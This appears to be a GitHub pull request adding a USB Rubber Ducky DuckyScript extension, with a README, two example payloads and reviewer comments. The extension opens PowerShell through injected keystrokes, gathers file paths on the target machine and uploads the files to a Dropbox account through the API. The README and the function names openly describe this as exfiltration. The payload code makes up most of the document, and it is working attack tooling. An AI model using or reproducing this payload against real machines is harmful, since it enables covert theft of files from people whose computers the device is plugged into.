Extension: Send Files Through Dropbox - Windows #399
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,110 @@ | ||
| # Send Files Through Dropbox - Windows | ||
|
|
||
| This extension can be used to send one or more files through the Dropbox API without having to copy and paste reused code every time, but standardizing a methodology that avoids errors. | ||
|
|
||
| ``` | ||
| How many files do you want to exfiltrate? | ||
| | | ||
| |-- Single File | ||
| | | | ||
| | |-- Do you already know the full file path? (e.g., C:\Users\Aleff\Downloads\photo.png) | ||
| | | | | ||
| | | |-- Use the #SINGLE-FILE version | ||
| | | | | | ||
| | | | |-- Set #SINGLE-FILE to TRUE | ||
| | | | |-- Define the file path in #SINGLE-PATH | ||
| | | | | ||
| | |-- Don't know the full path but can obtain it at runtime through PowerShell? | ||
| | | | | ||
| | | |-- Use the $dropboxFilePath variable | ||
| | | | | | ||
| | | | |-- Set #SINGLE-FILE to TRUE | ||
| | | | |-- Obtain the file path through PowerShell and assign it to $dropboxFilePath | ||
| | | ||
| |-- Multiple Files | ||
| | | | ||
| | |-- Set the #MULTIPLE-FILES variable to TRUE | ||
| | | | | ||
| | | |-- Use an array of strings named $dropboxFilePaths to collect the paths of all the files you want to use | ||
|
|
||
| ``` | ||
|
|
||
|
|
||
| ## Target Environment | ||
|
|
||
| - **Target**: Windows PowerShell | ||
|
|
||
| ## Usage | ||
|
|
||
| Insert this extension when you have one or more files that you want to send or exfiltrate via Dropbox. | ||
|
|
||
| ## Configuration | ||
|
|
||
| Before using the extension, you need to configure it by setting certain variables in the DuckyScript payload. Here are the configuration options: | ||
|
|
||
| ### 1. Dropbox Access Token | ||
|
|
||
| - **Variable**: #DROPBOX_ACCESS_TOKEN | ||
| - **Type**: String | ||
| - **Description**: You must set this variable with your personal Dropbox access token, which you can obtain from your Dropbox account. | ||
|
|
||
| Example in DuckyScript: | ||
| ```DuckyScript | ||
| DEFINE #DROPBOX_ACCESS_TOKEN YOUR_DROPBOX_ACCESS_TOKEN | ||
| ``` | ||
|
|
||
| ### 2. Single File or Multiple Files | ||
|
|
||
| You can choose to send a single file or multiple files. Configure the extension accordingly. | ||
|
|
||
| #### Single File Configuration | ||
|
|
||
| - **Variable**: #SINGLE-FILE | ||
| - **Type**: Boolean (TRUE or FALSE) | ||
| - **Description**: Set #SINGLE-FILE to TRUE if you want to send just one file. In this case, you will need to specify the file path within the #SINGLE-PATH variable. Alternatively, you can acquire the file path at runtime via PowerShell and store it in the $dropboxFilePath variable. | ||
|
|
||
| Example in DuckyScript: | ||
| ```DuckyScript | ||
| DEFINE #SINGLE-FILE TRUE | ||
| DEFINE #SINGLE-PATH C:\Users\Aleff\Downloads\photo.png | ||
| ``` | ||
|
|
||
| Example in PowerShell before using the extension: | ||
| ```powershell | ||
| $dropboxFilePath = "C:\Users\Aleff\Downloads\photo.png" | ||
| ``` | ||
|
|
||
| #### Multiple Files Configuration | ||
|
|
||
| - **Variable**: #MULTIPLE-FILES | ||
| - **Type**: Boolean (TRUE or FALSE) | ||
| - **Description**: Set #MULTIPLE-FILES to TRUE if you want to send multiple files. In this case, in PowerShell, you will have to create the variable $dropboxFilePaths, which is an array of strings containing the list of paths related to the files you want to export. | ||
|
|
||
| Example in PowerShell before using the extension: | ||
| ```powershell | ||
| $dropboxFilePaths = @( | ||
| "C:\Users\Aleff\Downloads\photo.png", | ||
| "C:\Users\Aleff\Downloads\document.pdf", | ||
| "C:\Users\Aleff\Downloads\song.mp3" | ||
| ) | ||
| ``` | ||
|
|
||
| **Tips for Working with Arrays in PowerShell:** | ||
|
|
||
| - How to create an array: | ||
| ```powershell | ||
| $dropboxFilePaths = @() | ||
| ``` | ||
|
|
||
| - How to add an element to the array: | ||
| ```powershell | ||
| $dropboxFilePaths += "C:\Users\Aleff\Downloads\photo.png" | ||
| ``` | ||
|
|
||
| - How to view the array: | ||
| ```powershell | ||
| $dropboxFilePaths | ||
| ``` | ||
|
|
||
| That's it! You can now use this extension with the appropriate configuration to send files via the Dropbox API using USB Rubber Ducky. | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| In all examples it is good to look at the extension configuration settings to understand the differences. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,127 @@ | ||
| REM I don't use the detect ready extension so as not to divert attention, but it would be best | ||
| DELAY 3000 | ||
| GUI r | ||
| DELAY 500 | ||
| STRING powershell | ||
| DELAY 500 | ||
| ENTER | ||
| DELAY 2000 | ||
|
|
||
| REM This is simply an example so to get the full path I use this command, but of course you use whatever way you see fit to get the path to your file(s) | ||
| STRINGLN $files = Get-ChildItem -Path . | ||
| STRINGLN $dropboxFilePaths += $files.FullName[0] | ||
| STRINGLN $dropboxFilePaths += $files.FullName[1] | ||
| REM ... and so on ... | ||
|
|
||
| REM At this time you need the variable $dropboxFilePath to contain the path to the file you want to exfiltrate | ||
|
|
||
|
|
||
| EXTENSION SEND_FILES_THROUGH_DROPBOX_WINDOWS | ||
| REM VERSION 1.0 | ||
| REM AUTHOR: Aleff | ||
|
|
||
| REM_BLOCK Documentation | ||
| This extension is used to send one or more files through the Dropbox API. | ||
|
|
||
| TARGET: | ||
| Windows PowerShell | ||
|
|
||
| USAGE: | ||
| Insert this extension when you have one or more files that you want to send via Dropbox. | ||
|
|
||
|
|
||
| CONFIGURATION: | ||
| Set #DROPBOX_ACCESS_TOKEN with a string - the string must be your personal Dropbox access token created from your Dropbox account. | ||
|
|
||
| Set #SINGLE-FILE with TRUE if you want to send just one file. In this case you will need to specify the file path within the #SINGLE-PATH variable OR, in case the exact path to the file you can only acquire it at runtime and so via the powershell, use in the powershell the $dropboxFilePath variable to capture this path. | ||
| i.e. in DuckyScript EXTENSION | ||
| DEFINE #SINGLE-FILE C:\Users\Aleff\Downloads\photo.png | ||
| i.e. in PowerShell before extension | ||
| $dropboxFilePath = "C:\Users\Aleff\Downloads\photo.png" | ||
|
|
||
| Set #MULTIPLE-FILES TRUE if you want to send multiple files. In this case in the PowerShell you will have to create the variable $dropboxFilePaths, which is an array of strings that should contain the list of paths related to the files you want to export. | ||
| i.e. in PowerShell before extension: | ||
| $dropboxFilePaths = @( | ||
| "C:\Users\Aleff\Downloads\photo.png", | ||
| "C:\Users\Aleff\Downloads\document.pdf", | ||
| "C:\Users\Aleff\Downloads\song.mp3" | ||
| ) | ||
| Some tips: | ||
| How to create an Array? | ||
| > $dropboxFilePaths = @() | ||
| How to add an element? | ||
| > $dropboxFilePaths += "C:\Users\Aleff\Downloads\photo.png" | ||
| How to see the array? | ||
| > $dropboxFilePaths | ||
|
|
||
|
|
||
| END_REM | ||
|
|
||
| REM Settings | ||
|
|
||
| DEFINE #DROPBOX_ACCESS_TOKEN 0 | ||
| DEFINE #SINGLE-FILE FALSE | ||
| DEFINE #SINGLE-PATH 0 | ||
| DEFINE #MULTIPLE-FILES TRUE | ||
|
|
||
| REM From now don't change anything else. | ||
|
|
||
| DEFINE #UPLOAD-URL $uploadUrl="https://content.dropboxapi.com/2/files/upload" | ||
|
|
||
| DEFINE #CREATE-HEADERS $headers=@{} | ||
| DEFINE #HEADERS-ADD-AUTH $headers.Add("Authorization","Bearer $accessToken") | ||
| DEFINE #HEADERS-USING-VAR-IN-POWERSHELL $headers.Add("Dropbox-API-Arg", '{"path":"$dropboxFilePath","mode":"add","autorename":true,"mute":false}') | ||
| DEFINE #HEADERS-CONENT-TYPE $headers.Add("Content-Type", "application/octet-stream") | ||
|
|
||
| DEFINE #SEND-REQUEST-USING-VAR-IN-POWERSHELL Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $dropboxFilePath; | ||
|
|
||
|
|
||
| FUNCTION SINGLE-FILE-EXFILTRATION() | ||
|
|
||
| STRINGLN #UPLOAD-URL | ||
| STRINGLN #CREATE-HEADERS | ||
| STRINGLN #HEADERS-ADD-AUTH | ||
|
|
||
| IF ( #SINGLE-PATH != 0 ) THEN | ||
|
There was a problem hiding this comment. while technically correct for compile-time configuration you should use This will tell the compiler to conditionally include/exclude code from the inject.bin at compile time rather than forcing the duck to do a check at runtime https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/conditional-compilation There was a problem hiding this comment. after second review, i might be misreading this lol disregard; i believe this is just a default value check? There was a problem hiding this comment. The This is to say that basically for the single file one can use either the static version via the The use of the In the extension description I realized an error, the use of the variable |
||
|
|
||
| STRINGLN $headers.Add("Dropbox-API-Arg", '{"path":"#SINGLE-PATH","mode":"add","autorename":true,"mute":false}') | ||
| STRINGLN #HEADERS-CONENT-TYPE | ||
| STRINGLN Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body #SINGLE-PATH | ||
|
|
||
| ELSE IF ( #SINGLE-PATH == 0 ) THEN | ||
|
|
||
| STRINGLN #HEADERS-USING-VAR-IN-POWERSHELL | ||
| STRINGLN #HEADERS-CONENT-TYPE | ||
| STRINGLN #SEND-REQUEST-USING-VAR-IN-POWERSHELL | ||
|
|
||
| END_IF | ||
|
|
||
| END_FUNCTION | ||
|
|
||
| FUNCTION MULTIPLE-FILES-EXFILTRATION() | ||
|
|
||
| STRINGLN foreach ($dropboxFilePath in $dropboxFilePaths) { | ||
| STRINGLN #CREATE-HEADERS | ||
| STRINGLN #HEADERS-ADD-AUTH | ||
| STRINGLN #HEADERS-USING-VAR-IN-POWERSHELL | ||
| STRINGLN #HEADERS-CONENT-TYPE | ||
| STRINGLN #SEND-REQUEST-USING-VAR-IN-POWERSHELL | ||
| STRINGLN } | ||
|
|
||
| END_FUNCTION | ||
|
|
||
| IF ( #DROPBOX_ACCESS_TOKEN != 0) THEN | ||
|
|
||
| STRINGLN #UPLOAD-URL | ||
|
|
||
| IF_DEFINED_TRUE #SINGLE-FILE | ||
| SINGLE-FILE-EXFILTRATION() | ||
| END_IF_DEFINED | ||
|
|
||
| IF_DEFINED_TRUE #MULTIPLE-FILES | ||
| MULTIPLE-FILES-EXFILTRATION() | ||
| END_IF_DEFINED | ||
|
|
||
| END_IF | ||
|
|
||
| END_EXTENSION | ||
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,119 @@ | ||
| REM I don't use the detect ready extension so as not to divert attention, but it would be best | ||
| DELAY 3000 | ||
| GUI r | ||
| DELAY 500 | ||
| STRING powershell | ||
| DELAY 500 | ||
| ENTER | ||
| DELAY 2000 | ||
|
|
||
| REM In this case, you will not need to do any other operations... | ||
|
|
||
| EXTENSION SEND_FILES_THROUGH_DROPBOX_WINDOWS | ||
| REM VERSION 1.0 | ||
| REM AUTHOR: Aleff | ||
|
|
||
| REM_BLOCK Documentation | ||
| This extension is used to send one or more files through the Dropbox API. | ||
|
|
||
| TARGET: | ||
| Windows PowerShell | ||
|
|
||
| USAGE: | ||
| Insert this extension when you have one or more files that you want to send via Dropbox. | ||
|
|
||
|
|
||
| CONFIGURATION: | ||
| Set #DROPBOX_ACCESS_TOKEN with a string - the string must be your personal Dropbox access token created from your Dropbox account. | ||
|
|
||
| Set #SINGLE-FILE with TRUE if you want to send just one file. In this case you will need to specify the file path within the #SINGLE-PATH variable OR, in case the exact path to the file you can only acquire it at runtime and so via the powershell, use in the powershell the $dropboxFilePath variable to capture this path. | ||
| i.e. in DuckyScript EXTENSION | ||
| DEFINE #SINGLE-FILE C:\Users\Aleff\Downloads\photo.png | ||
| i.e. in PowerShell before extension | ||
| $dropboxFilePath = "C:\Users\Aleff\Downloads\photo.png" | ||
|
|
||
| Set #MULTIPLE-FILES TRUE if you want to send multiple files. In this case in the PowerShell you will have to create the variable $dropboxFilePaths, which is an array of strings that should contain the list of paths related to the files you want to export. | ||
| i.e. in PowerShell before extension: | ||
| $dropboxFilePaths = @( | ||
| "C:\Users\Aleff\Downloads\photo.png", | ||
| "C:\Users\Aleff\Downloads\document.pdf", | ||
| "C:\Users\Aleff\Downloads\song.mp3" | ||
| ) | ||
| Some tips: | ||
| How to create an Array? | ||
| > $dropboxFilePaths = @() | ||
| How to add an element? | ||
| > $dropboxFilePaths += "C:\Users\Aleff\Downloads\photo.png" | ||
| How to see the array? | ||
| > $dropboxFilePaths | ||
|
|
||
|
|
||
| END_REM | ||
|
|
||
| REM Settings | ||
|
|
||
| DEFINE #DROPBOX_ACCESS_TOKEN my-personale-dropbox-access-token | ||
| DEFINE #SINGLE-FILE TRUE | ||
| DEFINE #SINGLE-PATH C:\Users\Aleff\Downloads\photo.png | ||
| DEFINE #MULTIPLE-FILES FALSE | ||
|
|
||
| REM From now don't change anything else. | ||
|
|
||
| DEFINE #UPLOAD-URL $uploadUrl="https://content.dropboxapi.com/2/files/upload" | ||
|
|
||
| DEFINE #CREATE-HEADERS $headers=@{} | ||
| DEFINE #HEADERS-ADD-AUTH $headers.Add("Authorization","Bearer $accessToken") | ||
| DEFINE #HEADERS-USING-VAR-IN-POWERSHELL $headers.Add("Dropbox-API-Arg", '{"path":"$dropboxFilePath","mode":"add","autorename":true,"mute":false}') | ||
| DEFINE #HEADERS-CONENT-TYPE $headers.Add("Content-Type", "application/octet-stream") | ||
|
|
||
| DEFINE #SEND-REQUEST-USING-VAR-IN-POWERSHELL Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $dropboxFilePath; | ||
|
|
||
|
|
||
| FUNCTION SINGLE-FILE-EXFILTRATION() | ||
|
|
||
| STRINGLN #UPLOAD-URL | ||
| STRINGLN #CREATE-HEADERS | ||
| STRINGLN #HEADERS-ADD-AUTH | ||
|
|
||
| IF ( #SINGLE-PATH != 0 ) THEN | ||
|
|
||
| STRINGLN $headers.Add("Dropbox-API-Arg", '{"path":"#SINGLE-PATH","mode":"add","autorename":true,"mute":false}') | ||
| STRINGLN #HEADERS-CONENT-TYPE | ||
| STRINGLN Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body #SINGLE-PATH | ||
|
|
||
| ELSE IF ( #SINGLE-PATH == 0 ) THEN | ||
|
|
||
| STRINGLN #HEADERS-USING-VAR-IN-POWERSHELL | ||
| STRINGLN #HEADERS-CONENT-TYPE | ||
| STRINGLN #SEND-REQUEST-USING-VAR-IN-POWERSHELL | ||
|
|
||
| END_IF | ||
|
|
||
| END_FUNCTION | ||
|
|
||
| FUNCTION MULTIPLE-FILES-EXFILTRATION() | ||
|
|
||
| STRINGLN foreach ($dropboxFilePath in $dropboxFilePaths) { | ||
| STRINGLN #CREATE-HEADERS | ||
| STRINGLN #HEADERS-ADD-AUTH | ||
| STRINGLN #HEADERS-USING-VAR-IN-POWERSHELL | ||
| STRINGLN #HEADERS-CONENT-TYPE | ||
| STRINGLN #SEND-REQUEST-USING-VAR-IN-POWERSHELL | ||
| STRINGLN } | ||
|
|
||
| END_FUNCTION | ||
|
|
||
| IF ( #DROPBOX_ACCESS_TOKEN != 0) THEN | ||
|
|
||
| STRINGLN #UPLOAD-URL | ||
|
|
||
| IF_DEFINED_TRUE #SINGLE-FILE | ||
| SINGLE-FILE-EXFILTRATION() | ||
| END_IF_DEFINED | ||
|
|
||
| IF_DEFINED_TRUE #MULTIPLE-FILES | ||
| MULTIPLE-FILES-EXFILTRATION() | ||
| END_IF_DEFINED | ||
| END_IF | ||
|
|
||
| END_EXTENSION |
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
if the only options are
SINGLE-FILE|MULTIPLE-FILESI would suggest refactoring this so that there is only one flag to toggle; this eliminates the possibility of a user setting both to true, or both to false.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I realize i commented on the exmaple, but this suggestion is meant for the extension itself lol
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Right note, I thank you for the report.
I will fix this issue in the next commit.